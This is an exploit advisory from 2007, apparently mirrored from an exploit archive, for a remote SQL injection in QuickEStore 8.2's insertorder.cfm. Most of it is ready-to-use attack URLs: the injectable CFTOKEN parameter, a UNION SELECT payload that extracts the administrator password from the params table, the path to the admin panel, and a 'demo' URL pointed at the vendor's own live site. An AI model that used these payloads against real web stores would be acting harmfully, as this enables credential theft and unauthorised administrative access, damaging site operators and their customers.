QuickEStore <= 8.2 (insertorder.cfm) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : QuickEStore <= 8.2 (insertorder.cfm) Remote SQL Injection Vulnerability
# Published : 2007-07-18
# Author : meoconx
# Previous Title : Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit
# Next Title : Joomla Component Expose <= RC35 Remote File Upload Vulnerability

author:meoconx[at]vnbrain.net
web application:QuickEStore
Main Page:www.quickestore.com
bug:

sql injection at insertorder.cfm?CFID=123&CFTOKEN=1'

exploit:

http://www.xxx.com/insertorder.cfm?CFID=123&CFTOKEN=1[sql query]

get admin password:
http://www.xxx.com/insertorder.cfm?CFID=123&CFTOKEN=1 union select 1,2,3,password,5,6,7,8,9,10,11,12 from params"having 1=1

link admin:http://www.xxx.com/admin/

demo(main site :D :D):
http://www.quickestore.com/ppec/insertorder.cfm?CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15%20from%20params%22having%201=1

# www.Syue.com [2007-07-18]